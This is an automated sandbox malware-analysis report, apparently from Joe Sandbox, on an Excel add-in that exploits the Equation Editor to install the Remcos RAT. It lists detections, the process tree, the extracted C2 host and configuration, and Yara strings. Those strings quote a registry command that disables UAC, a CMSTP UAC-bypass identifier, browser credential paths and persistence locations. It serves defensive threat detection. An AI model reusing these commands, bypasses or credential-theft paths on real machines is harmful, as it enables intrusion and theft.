Edit tour

Windows Analysis Report
202404294766578200.xlam.xlsx

Overview

General Information

Sample name:	202404294766578200.xlam.xlsx
Analysis ID:	1435094
MD5:	9336f772a40e762cc855b7c9b75b1d28
SHA1:	837d90dbe2f9c267e26ad4e170b7bd03d199f335
SHA256:	ca377ebfd8e0d57754a3780b6b7360a76efad94c8d5753e172a52802bf109ddc
Tags:	AgentTeslaxlamxlsx
Infos:

Detection

Remcos

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Contains functionality to bypass UAC (CMSTPLUA)

Detected Remcos RAT

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Sigma detected: Drops script at startup location

Sigma detected: EQNEDT32.EXE connecting to internet

Sigma detected: File Dropped By EQNEDT32EXE

Sigma detected: Remcos

System process connects to network (likely due to code injection or exploit)

Yara detected Remcos RAT

Yara detected UAC Bypass using CMSTP

Binary is likely a compiled AutoIt script file

C2 URLs / IPs found in malware configuration

Contains functionality to inject code into remote processes

Contains functionality to register a low level keyboard hook

Contains functionality to steal Chrome passwords or cookies

Contains functionality to steal Firefox passwords or cookies

Delayed program exit found

Document exploit detected (process start blacklist hit)

Drops VBS files to the startup folder

Found API chain indicative of sandbox detection

Installs a global keyboard hook

Machine Learning detection for dropped file

Maps a DLL or memory area into another process

Office equation editor drops PE file

Office equation editor establishes network connection

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Searches for Windows Mail specific files

Shellcode detected

Sigma detected: Equation Editor Network Connection

Sigma detected: Suspicious Binary In User Directory Spawned From Office Application

Sigma detected: Suspicious Microsoft Office Child Process

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Instant Messenger accounts or passwords

Tries to steal Mail credentials (via file / registry access)

Writes to foreign memory regions

Yara detected WebBrowserPassView password recovery tool

Abnormal high CPU Usage

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Contains functionality for read data from the clipboard

Contains functionality to block mouse and keyboard input (often used to hinder debugging)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to communicate with device drivers

Contains functionality to download and launch executables

Contains functionality to dynamically determine API calls

Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)

Contains functionality to enumerate running services

Contains functionality to execute programs as a different user

Contains functionality to launch a control a shell (cmd.exe)

Contains functionality to launch a process as a different user

Contains functionality to launch a program with higher privileges

Contains functionality to modify clipboard data

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to shutdown / reboot the system

Contains functionality to simulate keystroke presses

Contains functionality to simulate mouse events

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Creates a start menu entry (Start Menu\Programs\Startup)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Document misses a certain OLE stream usually present in this Microsoft Office document type

Downloads executable code via HTTP

Drops PE files

Enables debug privileges

Extensive use of GetProcAddress (often used to hide API calls)

Found decision node followed by non-executed suspicious APIs

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

OS version to string mapping found (often used in BOTs)

Office Equation Editor has been started

Potential key logger detected (key state polling based)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sigma detected: Uncommon Svchost Parent Process

Stores files to the Windows start menu directory

Uses Microsoft's Enhanced Cryptographic Provider

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Process Tree

System is w7x64

EXCEL.EXE (PID: 1216 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)

EQNEDT32.EXE (PID: 800 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)

YED.exe (PID: 652 cmdline: C:\Users\user\AppData\Roaming\YED.exe MD5: 9ABB13386C543EB5FEA7DEA95EB86D26)

Bactris.exe (PID: 3740 cmdline: C:\Users\user\AppData\Roaming\YED.exe MD5: A8004A594D5D55F5A5F5ABDBB8001FA9)

svchost.exe (PID: 3680 cmdline: C:\Users\user\AppData\Roaming\YED.exe MD5: 54A47F6B5E09A77E61649109C6A08866)

svchost.exe (PID: 3752 cmdline: C:\Windows\SysWOW64\svchost.exe /stext "C:\Users\user\AppData\Local\Temp\qcbxbnrr" MD5: 54A47F6B5E09A77E61649109C6A08866)

svchost.exe (PID: 3712 cmdline: C:\Windows\SysWOW64\svchost.exe /stext "C:\Users\user\AppData\Local\Temp\seghufctinb" MD5: 54A47F6B5E09A77E61649109C6A08866)

svchost.exe (PID: 3672 cmdline: C:\Windows\SysWOW64\svchost.exe /stext "C:\Users\user\AppData\Local\Temp\dyuauqnmwvtskce" MD5: 54A47F6B5E09A77E61649109C6A08866)

chrome.exe (PID: 1564 cmdline: "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http:/// MD5: FFA2B8E17F645BCC20F0E0201FEF83ED)

chrome.exe (PID: 2960 cmdline: "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1364 --field-trial-handle=1452,i,15568989383610033621,8608539169459799112,131072 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: FFA2B8E17F645BCC20F0E0201FEF83ED)

chrome.exe (PID: 2068 cmdline: "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http:/// MD5: FFA2B8E17F645BCC20F0E0201FEF83ED)

chrome.exe (PID: 3672 cmdline: "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=892 --field-trial-handle=1396,i,13358231411772672971,2555512376125685792,131072 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: FFA2B8E17F645BCC20F0E0201FEF83ED)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Remcos, RemcosRAT	Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.	APT33 The Gorgon Group UAC-0050	http://malware-traffic-analysis.net/2017/12/22/index.html https://asec.ahnlab.com/en/32376/ https://asec.ahnlab.com/ko/25837/ https://asec.ahnlab.com/ko/32101/ https://blog.360totalsecurity.com/en/vendetta-new-threat-actor-from-europe/	https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

Malware Configuration

Threatname: Remcos

{"Version": "4.9.4 Pro", "Host:Port:Password": "yuahdgbceja.sytes.net:2766:1", "Assigned name": "Grace-Host2024", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "AppData", "Copy file": "hua.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-E70NOS", "Keylog flag": "1", "Keylog path": "AppData", "Keylog file": "logs.dat", "Keylog crypt": "Enable", "Hide keylog file": "Enable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
sheet1.xml	INDICATOR_XML_LegacyDrawing_AutoLoad_Document	detects AutoLoad documents using LegacyDrawing	ditekSHen	0x24c3:$s1: <legacyDrawing r:id=" 0x24eb:$s2: <oleObject progId=" 0x2524:$s3: autoLoad="true"

Memory Dumps

Source	Rule	Description	Author	Strings
00000011.00000002.783602919.0000000000400000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
00000011.00000002.783602919.0000000000400000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
00000011.00000002.783602919.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x6c4a8:$a1: Remcos restarted by watchdog! 0x6ca20:$a3: %02i:%02i:%02i:%03i
00000011.00000002.783602919.0000000000400000.00000040.80000000.00040000.00000000.sdmp	REMCOS_RAT_variants	unknown	unknown	0x664fc:$str_a1: C:\Windows\System32\cmd.exe 0x66478:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x66478:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x66978:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x671a8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x6656c:$str_b2: Executing file: 0x675ec:$str_b3: GetDirectListeningPort 0x66f98:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x67118:$str_b7: \update.vbs 0x66594:$str_b9: Downloaded file: 0x66580:$str_b10: Downloading file: 0x66624:$str_b12: Failed to upload file: 0x675b4:$str_b13: StartForward 0x675d4:$str_b14: StopForward 0x67070:$str_b15: fso.DeleteFile " 0x67004:$str_b16: On Error Resume Next 0x670a0:$str_b17: fso.DeleteFolder " 0x66614:$str_b18: Uploaded file: 0x665d4:$str_b19: Unable to delete: 0x67038:$str_b20: while fso.FileExists(" 0x66ab1:$str_c0: [Firefox StoredLogins not found]
00000011.00000002.783602919.0000000000400000.00000040.80000000.00040000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x663e8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x6637c:$s1: CoGetObject 0x66390:$s1: CoGetObject 0x663ac:$s1: CoGetObject 0x70338:$s1: CoGetObject 0x6633c:$s2: Elevation:Administrator!new:
00000010.00000002.762640645.0000000002990000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
00000010.00000002.762640645.0000000002990000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
00000010.00000002.762640645.0000000002990000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x6aaa8:$a1: Remcos restarted by watchdog! 0x6b020:$a3: %02i:%02i:%02i:%03i
00000010.00000002.762640645.0000000002990000.00000004.00001000.00020000.00000000.sdmp	REMCOS_RAT_variants	unknown	unknown	0x64afc:$str_a1: C:\Windows\System32\cmd.exe 0x64a78:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x64a78:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x64f78:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x657a8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x64b6c:$str_b2: Executing file: 0x65bec:$str_b3: GetDirectListeningPort 0x65598:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x65718:$str_b7: \update.vbs 0x64b94:$str_b9: Downloaded file: 0x64b80:$str_b10: Downloading file: 0x64c24:$str_b12: Failed to upload file: 0x65bb4:$str_b13: StartForward 0x65bd4:$str_b14: StopForward 0x65670:$str_b15: fso.DeleteFile " 0x65604:$str_b16: On Error Resume Next 0x656a0:$str_b17: fso.DeleteFolder " 0x64c14:$str_b18: Uploaded file: 0x64bd4:$str_b19: Unable to delete: 0x65638:$str_b20: while fso.FileExists(" 0x650b1:$str_c0: [Firefox StoredLogins not found]
00000010.00000002.762640645.0000000002990000.00000004.00001000.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x649e8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x6497c:$s1: CoGetObject 0x64990:$s1: CoGetObject 0x649ac:$s1: CoGetObject 0x6e938:$s1: CoGetObject 0x6493c:$s2: Elevation:Administrator!new:
Process Memory Space: Bactris.exe PID: 3740	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
Process Memory Space: Bactris.exe PID: 3740	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
Process Memory Space: Bactris.exe PID: 3740	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x102426:$a1: Remcos restarted by watchdog! 0x102980:$a3: %02i:%02i:%02i:%03i 0x102daf:$a3: %02i:%02i:%02i:%03i
Process Memory Space: svchost.exe PID: 3680	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
Process Memory Space: svchost.exe PID: 3680	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
Process Memory Space: svchost.exe PID: 3680	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
Process Memory Space: svchost.exe PID: 3680	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x224be:$a1: Remcos restarted by watchdog! 0x22a18:$a3: %02i:%02i:%02i:%03i 0x22e47:$a3: %02i:%02i:%02i:%03i
Process Memory Space: svchost.exe PID: 3752	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
Click to see the 13 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
17.2.svchost.exe.400000.0.raw.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
17.2.svchost.exe.400000.0.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
17.2.svchost.exe.400000.0.raw.unpack	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x6c4a8:$a1: Remcos restarted by watchdog! 0x6ca20:$a3: %02i:%02i:%02i:%03i
17.2.svchost.exe.400000.0.raw.unpack	REMCOS_RAT_variants	unknown	unknown	0x664fc:$str_a1: C:\Windows\System32\cmd.exe 0x66478:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x66478:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x66978:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x671a8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x6656c:$str_b2: Executing file: 0x675ec:$str_b3: GetDirectListeningPort 0x66f98:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x67118:$str_b7: \update.vbs 0x66594:$str_b9: Downloaded file: 0x66580:$str_b10: Downloading file: 0x66624:$str_b12: Failed to upload file: 0x675b4:$str_b13: StartForward 0x675d4:$str_b14: StopForward 0x67070:$str_b15: fso.DeleteFile " 0x67004:$str_b16: On Error Resume Next 0x670a0:$str_b17: fso.DeleteFolder " 0x66614:$str_b18: Uploaded file: 0x665d4:$str_b19: Unable to delete: 0x67038:$str_b20: while fso.FileExists(" 0x66ab1:$str_c0: [Firefox StoredLogins not found]
17.2.svchost.exe.400000.0.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x663e8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x6637c:$s1: CoGetObject 0x66390:$s1: CoGetObject 0x663ac:$s1: CoGetObject 0x70338:$s1: CoGetObject 0x6633c:$s2: Elevation:Administrator!new:
16.2.Bactris.exe.2990000.1.raw.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
16.2.Bactris.exe.2990000.1.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
16.2.Bactris.exe.2990000.1.raw.unpack	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x6aaa8:$a1: Remcos restarted by watchdog! 0x6b020:$a3: %02i:%02i:%02i:%03i
16.2.Bactris.exe.2990000.1.raw.unpack	REMCOS_RAT_variants	unknown	unknown	0x64afc:$str_a1: C:\Windows\System32\cmd.exe 0x64a78:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x64a78:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x64f78:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x657a8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x64b6c:$str_b2: Executing file: 0x65bec:$str_b3: GetDirectListeningPort 0x65598:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x65718:$str_b7: \update.vbs 0x64b94:$str_b9: Downloaded file: 0x64b80:$str_b10: Downloading file: 0x64c24:$str_b12: Failed to upload file: 0x65bb4:$str_b13: StartForward 0x65bd4:$str_b14: StopForward 0x65670:$str_b15: fso.DeleteFile " 0x65604:$str_b16: On Error Resume Next 0x656a0:$str_b17: fso.DeleteFolder " 0x64c14:$str_b18: Uploaded file: 0x64bd4:$str_b19: Unable to delete: 0x65638:$str_b20: while fso.FileExists(" 0x650b1:$str_c0: [Firefox StoredLogins not found]
16.2.Bactris.exe.2990000.1.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x649e8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x6497c:$s1: CoGetObject 0x64990:$s1: CoGetObject 0x649ac:$s1: CoGetObject 0x6e938:$s1: CoGetObject 0x6493c:$s2: Elevation:Administrator!new:
16.2.Bactris.exe.2990000.1.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
16.2.Bactris.exe.2990000.1.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
16.2.Bactris.exe.2990000.1.unpack	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x690a8:$a1: Remcos restarted by watchdog! 0x69620:$a3: %02i:%02i:%02i:%03i
16.2.Bactris.exe.2990000.1.unpack	REMCOS_RAT_variants	unknown	unknown	0x630fc:$str_a1: C:\Windows\System32\cmd.exe 0x63078:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x63078:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x63578:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x63da8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x6316c:$str_b2: Executing file: 0x641ec:$str_b3: GetDirectListeningPort 0x63b98:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x63d18:$str_b7: \update.vbs 0x63194:$str_b9: Downloaded file: 0x63180:$str_b10: Downloading file: 0x63224:$str_b12: Failed to upload file: 0x641b4:$str_b13: StartForward 0x641d4:$str_b14: StopForward 0x63c70:$str_b15: fso.DeleteFile " 0x63c04:$str_b16: On Error Resume Next 0x63ca0:$str_b17: fso.DeleteFolder " 0x63214:$str_b18: Uploaded file: 0x631d4:$str_b19: Unable to delete: 0x63c38:$str_b20: while fso.FileExists(" 0x636b1:$str_c0: [Firefox StoredLogins not found]
16.2.Bactris.exe.2990000.1.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x62fe8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x62f7c:$s1: CoGetObject 0x62f90:$s1: CoGetObject 0x62fac:$s1: CoGetObject 0x6cf38:$s1: CoGetObject 0x62f3c:$s2: Elevation:Administrator!new:
17.2.svchost.exe.400000.0.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
17.2.svchost.exe.400000.0.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
17.2.svchost.exe.400000.0.unpack	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x6aaa8:$a1: Remcos restarted by watchdog! 0x6b020:$a3: %02i:%02i:%02i:%03i
17.2.svchost.exe.400000.0.unpack	REMCOS_RAT_variants	unknown	unknown	0x64afc:$str_a1: C:\Windows\System32\cmd.exe 0x64a78:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x64a78:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x64f78:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x657a8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x64b6c:$str_b2: Executing file: 0x65bec:$str_b3: GetDirectListeningPort 0x65598:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x65718:$str_b7: \update.vbs 0x64b94:$str_b9: Downloaded file: 0x64b80:$str_b10: Downloading file: 0x64c24:$str_b12: Failed to upload file: 0x65bb4:$str_b13: StartForward 0x65bd4:$str_b14: StopForward 0x65670:$str_b15: fso.DeleteFile " 0x65604:$str_b16: On Error Resume Next 0x656a0:$str_b17: fso.DeleteFolder " 0x64c14:$str_b18: Uploaded file: 0x64bd4:$str_b19: Unable to delete: 0x65638:$str_b20: while fso.FileExists(" 0x650b1:$str_c0: [Firefox StoredLogins not found]
17.2.svchost.exe.400000.0.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x649e8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x6497c:$s1: CoGetObject 0x64990:$s1: CoGetObject 0x649ac:$s1: CoGetObject 0x6e938:$s1: CoGetObject 0x6493c:$s2: Elevation:Administrator!new:
Click to see the 15 entries

Sigma Signatures

Exploits

Sigma detected: EQNEDT32.EXE connecting to internet

Source: Network Connection

Author: Joe Security: Data: DestinationIp: 23.94.54.101, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 800, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49161

Sigma detected: File Dropped By EQNEDT32EXE

Source: File created

Author: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 800, TargetFilename: C:\Users\user\AppData\Roaming\YED.exe

System Summary

Sigma detected: Equation Editor Network Connection

Source: Network Connection

Author: Max Altgelt (Nextron Systems): Data: DestinationIp: 192.168.2.22, DestinationIsIpv6: false, DestinationPort: 49161, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 800, Protocol: tcp, SourceIp: 23.94.54.101, SourceIsIpv6: false, SourcePort: 80

Sigma detected: Suspicious Binary In User Directory Spawned From Office Application

Source: Process started

Author: Jason Lynch: Data: Command: C:\Users\user\AppData\Roaming\YED.exe, CommandLine: C:\Users\user\AppData\Roaming\YED.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\YED.exe, NewProcessName: C:\Users\user\AppData\Roaming\YED.exe, OriginalFileName: C:\Users\user\AppData\Roaming\YED.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 800, ParentProcessName: EQNEDT32.EXE, ProcessCommandLine: C:\Users\user\AppData\Roaming\YED.exe, ProcessId: 652, ProcessName: YED.exe

Sigma detected: Suspicious Microsoft Office Child Process

Source: Process started

Author: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io: Data: Command: C:\Users\user\AppData\Roaming\YED.exe, CommandLine: C:\Users\user\AppData\Roaming\YED.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\YED.exe, NewProcessName: C:\Users\user\AppData\Roaming\YED.exe, OriginalFileName: C:\Users\user\AppData\Roaming\YED.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 800, ParentProcessName: EQNEDT32.EXE, ProcessCommandLine: C:\Users\user\AppData\Roaming\YED.exe, ProcessId: 652, ProcessName: YED.exe

Sigma detected: Uncommon Svchost Parent Process

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: C:\Users\user\AppData\Roaming\YED.exe, CommandLine: C:\Users\user\AppData\Roaming\YED.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\YED.exe, ParentImage: C:\Users\user\AppData\Local\eupolyzoan\Bactris.exe, ParentProcessId: 3740, ParentProcessName: Bactris.exe, ProcessCommandLine: C:\Users\user\AppData\Roaming\YED.exe, ProcessId: 3680, ProcessName: svchost.exe

Sigma detected: Modification of IE Registry Settings

Source: Registry Key set

Author: frack113: Data: Details: 46 00 00 00 2A 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 00 00 00 C0 A8 02 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\svchost.exe, ProcessId: 3680, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings

Sigma detected: Windows Processes Suspicious Parent Directory

Source: Process started

Author: vburov: Data: Command: C:\Users\user\AppData\Roaming\YED.exe, CommandLine: C:\Users\user\AppData\Roaming\YED.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\YED.exe, ParentImage: C:\Users\user\AppData\Local\eupolyzoan\Bactris.exe, ParentProcessId: 3740, ParentProcessName: Bactris.exe, ProcessCommandLine: C:\Users\user\AppData\Roaming\YED.exe, ProcessId: 3680, ProcessName: svchost.exe

Data Obfuscation

Sigma detected: Drops script at startup location

Source: File created

Author: Joe Security: Data: EventID: 11, Image: C:\Users\user\AppData\Local\eupolyzoan\Bactris.exe, ProcessId: 3740, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bactris.vbs

Stealing of Sensitive Information

Sigma detected: Remcos

Source: Registry Key set

